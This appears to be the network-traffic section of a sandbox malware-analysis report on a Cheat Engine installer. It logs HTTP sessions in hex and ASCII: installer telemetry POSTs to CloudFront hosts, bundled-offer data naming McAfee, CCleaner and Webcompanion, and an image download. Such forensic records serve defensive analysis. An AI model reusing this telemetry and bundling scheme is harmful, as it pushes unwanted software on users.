                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC412INData Raw: 64 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 20 32 20 31 32 38 20 31 32 35
                                                                                                                                                                                                                                    Data Ascii: d79<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Page not found</title> <style> :root { --colorRgbFacetsTeal600: 2 128 125
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC1369INData Raw: 61 6c 4c 69 67 68 74 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 20 35 33 20 35 38 20 36 32 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 63 6f 6c 6f 72 54 65 78 74 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 29 3b 0a 20 20 20 20 20 20 20 20 2d 2d 65 66 66
                                                                                                                                                                                                                                    Data Ascii: alLight200); --colorRgbFacetsNeutralLight700: 53 58 62; --colorGrayDarkest: var(--colorRgbFacetsNeutralLight700); --colorGrayLighter: var(--colorRgbFacetsNeutralLight200); --colorText: var(--colorGrayDarkest); --eff
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC1369INData Raw: 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 76 61 72 28 2d 2d 65 66 66 65 63 74 53 68 61 64 6f 77 4c 69 67 68 74 53 68 61 6c 6c 6f 77 29 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 28 76 61 72 28 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 29 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: padding: 24px; background: white; border-radius: 8px; box-shadow: var(--effectShadowLightShallow); border: 1px solid rgb(var(--colorGrayLighter)); } a { margin: 0; font-weight: 600;
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC306INData Raw: 70 73 3a 2f 2f 61 6e 73 77 65 72 73 2e 6e 65 74 6c 69 66 79 2e 63 6f 6d 2f 74 2f 73 75 70 70 6f 72 74 2d 67 75 69 64 65 2d 69 2d 76 65 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e e2 80 9c 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 e2 80 9d 20 73 75 70 70 6f 72 74 20 67 75 69 64 65 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 74 69 70 73 2e 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: ps://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking" >page not found support guide</a > for troubleshooting tips.
                                                                                                                                                                                                                                    2024-12-28 21:20:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.54970665.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:09 UTC233OUTPOST /o HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json; Charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:09 UTC125OUTData Raw: 7b 22 70 72 76 22 3a 20 22 30 2e 31 22 2c 22 70 6c 76 22 3a 20 22 32 2e 34 30 2e 30 2e 39 31 30 35 22 2c 22 6c 22 3a 20 22 65 6e 22 2c 22 61 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 69 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 73 22 3a 20 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 6f 22 3a 20 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"prv": "0.1","plv": "2.40.0.9105","l": "en","a": "cheatengine","i": "cheatengine","s": "cheatengine","o": "10.0.19045.2006"}
                                                                                                                                                                                                                                    2024-12-28 21:20:10 UTC489INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Content-Length: 15463
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Server: awselb/2.0
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:10 GMT
                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                    x-true-request-id: d1a16146-1956-4b6c-b879-45f0dc8d648a
                                                                                                                                                                                                                                    x-robots-tag: none
                                                                                                                                                                                                                                    expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 e93c671d969240be8a6839ba09d3b732.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: NsgYQ3uSKUaOmKluQCOvWSrCum8lswtvFKw6_hUYrA9dczSi8yMk_g==
                                                                                                                                                                                                                                    2024-12-28 21:20:10 UTC7895INData Raw: 7b 22 76 22 3a 22 30 2e 31 22 2c 22 6c 22 3a 22 55 53 22 2c 22 69 22 3a 7b 22 63 75 22 3a 22 22 2c 22 63 74 22 3a 22 22 2c 22 63 70 22 3a 22 22 2c 22 63 74 75 22 3a 22 22 2c 22 63 6c 22 3a 22 22 2c 22 63 68 22 3a 22 22 2c 22 63 61 22 3a 22 76 35 2e 38 33 22 2c 22 63 66 22 3a 22 22 2c 22 63 70 69 22 3a 22 22 2c 22 63 70 73 22 3a 22 22 2c 22 63 64 22 3a 22 22 2c 22 63 70 72 22 3a 22 22 2c 22 63 70 70 22 3a 22 22 2c 22 63 66 6c 22 3a 22 22 2c 22 63 6a 22 3a 22 2b 31 22 2c 22 63 62 22 3a 22 22 2c 22 63 6f 64 22 3a 22 22 2c 22 63 74 70 22 3a 22 22 2c 22 63 65 70 22 3a 22 22 7d 2c 22 66 22 3a 7b 22 6d 22 3a 33 2c 22 78 22 3a 22 32 30 32 35 2d 30 39 2d 32 32 54 32 31 3a 32 30 3a 31 30 2e 34 32 33 5a 22 2c 22 61 22 3a 22 63 64 63 32 22 2c 22 64 22 3a 22 31 32 32
                                                                                                                                                                                                                                    Data Ascii: {"v":"0.1","l":"US","i":{"cu":"","ct":"","cp":"","ctu":"","cl":"","ch":"","ca":"v5.83","cf":"","cpi":"","cps":"","cd":"","cpr":"","cpp":"","cfl":"","cj":"+1","cb":"","cod":"","ctp":"","cep":""},"f":{"m":3,"x":"2025-09-22T21:20:10.423Z","a":"cdc2","d":"122
                                                                                                                                                                                                                                    2024-12-28 21:20:10 UTC7568INData Raw: 53 53 4f 52 5f 41 52 43 48 49 54 45 43 54 55 52 45 5c 5c 41 52 4d 36 34 22 5d 2c 22 63 70 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 63 61 66 65 65 2e 63 6f 6d 2f 63 6f 6e 73 75 6d 65 72 2f 65 6e 2d 75 73 2f 70 6f 6c 69 63 79 2f 67 6c 6f 62 61 6c 2f 6c 65 67 61 6c 2e 68 74 6d 6c 22 2c 22 63 74 75 22 3a 22 68 74 74 70 73 3a 2f 2f 68 6f 6d 65 2e 6d 63 61 66 65 65 2e 63 6f 6d 2f 52 6f 6f 74 2f 41 62 6f 75 74 55 73 2e 61 73 70 78 3f 69 64 3d 65 75 6c 61 22 2c 22 70 76 22 3a 22 31 2e 32 36 22 2c 22 6f 76 22 3a 36 33 2c 22 75 64 22 3a 74 72 75 65 2c 22 76 22 3a 34 7d 7d 2c 7b 22 61 64 22 3a 7b 22 6e 22 3a 22 22 2c 22 66 22 3a 22 5a 42 5f 43 43 6c 65 61 6e 65 72 5f 57 68 69 74 65 22 2c 22 6f 22 3a 22 43 43 6c 65 61 6e 65 72 22 7d 2c 22 70 73 22 3a 7b 22 69
                                                                                                                                                                                                                                    Data Ascii: SSOR_ARCHITECTURE\\ARM64"],"cp":"https://www.mcafee.com/consumer/en-us/policy/global/legal.html","ctu":"https://home.mcafee.com/Root/AboutUs.aspx?id=eula","pv":"1.26","ov":63,"ud":true,"v":4}},{"ad":{"n":"","f":"ZB_CCleaner_White","o":"CCleaner"},"ps":{"i


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.54971013.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:13 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json; Charset=UTF-8
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 390
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:13 UTC390OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:14 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:14 GMT
                                                                                                                                                                                                                                    Via: 1.1 9b3a0b2647b64bb06aa470977314bbb2.cloudfront.net (CloudFront), 1.1 16f88a640328f5c5351c2916207f0148.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C1
                                                                                                                                                                                                                                    X-Amz-Cf-Id: 2ocPW7IPygy_0G5jJdY6a-m7qfRCU_DGNLAx4b70yVE-uekRqlYcdg==


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.54971265.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:16 UTC139OUTGET /f/WebAdvisor/images/943/EN.png HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:17 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                    Content-Length: 48743
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Last-Modified: Wed, 23 Nov 2022 15:50:00 GMT
                                                                                                                                                                                                                                    x-amz-version-id: RW9gnZViDqHn6sjOaRWUaFg5F2z0vnXM
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Server: AmazonS3
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 05:40:34 GMT
                                                                                                                                                                                                                                    ETag: "4cfff8dc30d353cd3d215fd3a5dbac24"
                                                                                                                                                                                                                                    X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 90cdff7228f895ed6ae34a9448571062.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: HU6luPJp4QQTNw0bRmmmCvh2nLQ08Ba9KErRYxRuhpWPsnJXA0sHAQ==
                                                                                                                                                                                                                                    Age: 56384
                                                                                                                                                                                                                                    2024-12-28 21:20:17 UTC15873INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 68 08 06 00 00 00 b5 fd 28 e7 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 bd fc 49 44 41 54 78 01 ec bd bf b3 65 49 75 e7 bb ab 1b 01 c6 28 d4 0a 59 33 31 11 7d 71 c0 19 05 8d 60 14 a1 e7 74 e1 cf 04 8d 5a 83 c4 38 74 3b 78 33 c0 5f 40 e1 8c 33 06 30 de 7b 0e 45 84 22 80 26 1a 35 a1 67 8d 43 e1 bc 89 90 40 0d 92 25 9c 3e 72 84 35 a1 ea d0 18 42 02 ea ed 4f d5 fe dc 5e b5 2a f7 af 73 f6 b9 f7 dc 7b d6 37 e2 dc 7b ce fe 91 b9 72 e5 ca 95 2b 57 ae cc ec ba 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85
                                                                                                                                                                                                                                    Data Ascii: PNGIHDRh(pHYssRGBgAMAaIDATxeIu(Y31}q`tZ8t;x3_@30{E"&5gC@%>r5BO^*s{7{r+WBP(BP(BP(BP(BP(BP(
                                                                                                                                                                                                                                    2024-12-28 21:20:17 UTC16384INData Raw: e5 b4 e6 16 92 b4 8c 80 d8 f1 e5 fb 63 9e 0f 01 8f e9 d8 9c 5e 73 fa 75 29 ec 14 63 bd da 19 c7 74 5a 3c cb a1 16 91 87 ca 64 2c 07 65 6d 19 29 76 c2 7c 48 93 fc a1 6b ac ec 1a dc c8 87 cf 45 23 8c 8e 3a cb 5a 4c 6b 69 27 63 fb c9 bc 01 f2 2d 03 79 81 ae d8 a1 6a 28 90 5e 2e 53 34 fa f7 81 5e 2d f8 e6 94 aa bc 5e 8a 39 19 cb 60 80 ea c0 15 dd c2 fb 71 c0 81 6e 59 13 13 9b 65 2b fe d6 78 6e d1 7b cc dd 4f d6 e8 ea ae 7b 96 87 7a fb e1 11 f7 b2 2e 54 26 40 1e 9c 0a 8d b6 25 98 d2 69 f0 69 ad 1e 85 3e 0d 4b fb 14 bd cb ad f4 cc 7f 4d 9d 2c 91 bb 9c 8f b3 94 51 8f c4 74 f4 f0 46 d8 c6 90 d5 56 5f 89 47 dc 81 7f ec 2b 91 61 de a5 5e d4 ff 3a 3f c6 10 eb 21 3e 87 f1 dc ba bf b4 7e 6f 3a ca e0 2d 4c 02 43 57 af 99 1e c9 a9 4e 44 cf 92 06 80 9d 1e 0d 98 eb 2a d8
                                                                                                                                                                                                                                    Data Ascii: c^su)ctZ<d,em)v|HkE#:ZLki'c-yj(^.S4^-^9`qnYe+xn{O{z.T&@%ii>KM,QtFV_G+a^:?!>~o:-LCWND*
                                                                                                                                                                                                                                    2024-12-28 21:20:17 UTC15713INData Raw: 1d 82 7d 0c eb b9 e7 0f e1 e9 75 1a ba 62 2b fe ef 93 ce 3e fa 65 8e 67 6b d2 5c ab 77 e6 16 ab 1d 53 4f 8c e1 3a f5 a2 70 4a 1f 6f e5 58 18 db d2 3c d6 d4 df b1 db cf 12 79 5b 43 c3 92 67 b7 e6 51 4c 77 2a ed 2d db d5 29 a3 42 1a 0a 37 02 4c 0d 3b 05 35 16 2b 75 13 91 3d 22 37 01 73 75 e1 74 59 e1 76 e3 1c ea d9 45 3b 79 ea fb 54 10 db e2 92 81 f3 31 40 be 86 88 5d cc 84 57 15 0a d7 89 0a 69 58 80 db 1a d2 70 d3 b0 66 fa a8 70 5c 54 5d 14 ce 05 a7 2e eb a7 40 5f e9 83 c2 16 38 76 48 43 79 78 0b 37 06 a5 50 4f 07 55 17 85 73 c1 a9 cb fa 29 d0 57 fa a0 70 13 50 06 6f a1 50 28 14 0a 85 42 e1 56 a3 0c de 33 82 db 93 1c e3 80 84 eb 86 47 42 02 b6 66 6a 1d 45 7a 9d 60 27 86 b1 0d bb 59 f4 41 bd 1c 02 ca 3c b5 9f ef 75 83 ed 8e d6 d6 c9 3e fb 1a 1f 0b 5b b4 9d
                                                                                                                                                                                                                                    Data Ascii: }ub+>egk\wSO:pJoX<y[CgQLw*-)B7L;5+u="7sutYvE;yT1@]WiXpfp\T].@_8vHCyx7POUs)WpPoP(BV3GBfjEz`'YA<u>[
                                                                                                                                                                                                                                    2024-12-28 21:20:17 UTC773INData Raw: bc 3f 31 d7 ee a1 49 af e3 5a f3 0e d7 82 9e 98 de 1c c6 87 4e 67 4b 7f 8d 4d a9 38 65 39 65 c1 4f b5 85 1e 71 7a d0 f6 82 6b f0 be b5 6c 1c f3 c3 50 f8 b1 32 1c b3 eb 18 9b 97 da b9 14 7a 25 99 82 53 47 5d 32 2f f5 f6 6e 33 8d 61 b6 c8 f3 92 fc 32 07 9c 39 d1 7f 5d e9 a0 9b f4 58 6f e9 6f 11 d9 0e 46 58 f6 9d 09 2c b2 f8 7a b7 01 ce e1 95 49 1e 9b d0 0d a7 6a d8 96 a6 b3 a5 bf c6 6c 39 65 39 31 84 4d 7a 88 5b fe 66 ee f5 98 d8 85 b5 6c 5c 5a 26 53 e1 c7 ec 3a c6 e6 ad eb 28 02 f3 be 91 b8 9b 1a 90 69 17 73 4e 41 db 22 cf 73 f2 8b 20 67 8a 47 a6 2c ad c5 29 1e 7e 45 e4 7c 51 f0 8a c8 62 58 24 c5 bc c9 6c 11 15 f1 fb 50 bb 7c 5c 2b 08 db 88 5c 7a 37 29 87 a9 5e f6 87 04 81 9e 05 a8 75 61 9c 88 c8 d6 38 a5 e1 f1 f2 68 a6 34 88 8c 11 a1 25 0f cb b9 94 83 f5
                                                                                                                                                                                                                                    Data Ascii: ?1IZNgKM8e9eOqzklP2z%SG]2/n3a29]XooFX,zIjl9e91Mz[fl\Z&S:(isNA"s gG,)~E|QbX$lP|\+\z7)^ua8h4%


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.54971665.9.108.1484436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:19 UTC311OUTPOST /zbd HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 409
                                                                                                                                                                                                                                    Host: d34hwk9wxgk5fi.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:19 UTC409OUTData Raw: 7b 22 74 61 62 6c 65 22 3a 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 22 64 61 74 61 22 3a 22 7b 5c 22 30 5c 22 3a 5c 22 5c 22 2c 5c 22 31 5c 22 3a 5c 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5c 22 2c 5c 22 32 5c 22 3a 5c 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 5c 22 2c 5c 22 33 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 34 5c 22 3a 5c 22 63 68 65 61 74 65 6e 67 69 6e 65 5c 22 2c 5c 22 35 5c 22 3a 5c 22 57 65 62 63 6f 6d 70 61 6e 69 6f 6e 32 30 31 36 46 46 5c 22 2c 5c 22 31 38 5c 22 3a 5c 22 5a 42 5f 57 65 62 63 6f 6d 70 61 6e 69 6f 6e 46 46 5f 6e 65 77 5c 22 2c 5c 22 31 39 5c 22 3a 5c 22 70 61 63 5f 32 34 31 30 30 37 5c 22 2c 5c 22 32 31 5c 22 3a 5c 22 31 37
                                                                                                                                                                                                                                    Data Ascii: {"table":"zb_analytics","data":"{\"0\":\"\",\"1\":\"9e146be9-c76a-4720-bcdb-53011b87bd06\",\"2\":\"20241228162010\",\"3\":\"cheatengine\",\"4\":\"cheatengine\",\"5\":\"Webcompanion2016FF\",\"18\":\"ZB_WebcompanionFF_new\",\"19\":\"pac_241007\",\"21\":\"17
                                                                                                                                                                                                                                    2024-12-28 21:20:20 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 15
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:20 GMT
                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                    Via: 1.1 e287a2eedc3ea7a96ca60cf17cda7732.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                    X-Amz-Cf-Pop: TLV50-C2
                                                                                                                                                                                                                                    X-Amz-Cf-Id: NSkTysHyNulwTGDTa4bL-H-yGnKluUsiKb0DlabUCuZML0_WPhjL4g==
                                                                                                                                                                                                                                    2024-12-28 21:20:20 UTC15INData Raw: 7b 22 53 74 61 74 75 73 22 3a 22 4f 4b 22 7d
                                                                                                                                                                                                                                    Data Ascii: {"Status":"OK"}


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.54972013.226.4.1664436476C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-12-28 21:20:22 UTC308OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Authorization: Signature=8e6152e6eff9b23143a2f99ffb0c9baa897675f84641822e9aaaaeca9efe12b3
                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                                    Host: d31tu1fsc224h4.cloudfront.net
                                                                                                                                                                                                                                    2024-12-28 21:20:22 UTC464OUTData Raw: 7b 22 64 61 74 61 22 3a 20 5b 7b 22 73 6f 75 72 63 65 22 3a 20 22 70 6c 61 74 66 6f 72 6d 22 2c 20 22 65 76 65 6e 74 22 3a 20 22 7a 62 5f 61 6e 61 6c 79 74 69 63 73 22 2c 20 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 20 2c 20 22 63 72 65 61 74 65 64 5f 61 74 22 3a 31 37 33 35 34 32 30 38 37 30 30 30 30 2c 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 31 2e 30 2e 30 22 2c 20 22 70 72 6f 70 65 72 74 69 65 73 22 3a 20 7b 22 30 22 3a 22 22 2c 22 31 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 32 22 3a 22 32 30 32 34 31 32 32 38 31 36 32 30 31 30 22 2c 22 33 22 3a 22 63 68 65 61 74 65 6e 67 69 6e 65 22 2c 22 34 22 3a 22 63 68 65 61 74 65 6e 67 69 6e
                                                                                                                                                                                                                                    Data Ascii: {"data": [{"source": "platform", "event": "zb_analytics", "environment": "production" , "created_at":1735420870000, "version": "1.0.0", "properties": {"0":"","1":"9e146be9-c76a-4720-bcdb-53011b87bd06","2":"20241228162010","3":"cheatengine","4":"cheatengin
                                                                                                                                                                                                                                    2024-12-28 21:20:23 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 21:20:23 GMT
                                                                                                                                                                                                                                    Via: 1.1 f8637e7723c8fa39b50b55af99dbeff2.cloudfront.net (CloudFront), 1.1 5314ccfb7ed3e1df568a8f1ffab668b4.cloudfront.net (CloudFront)
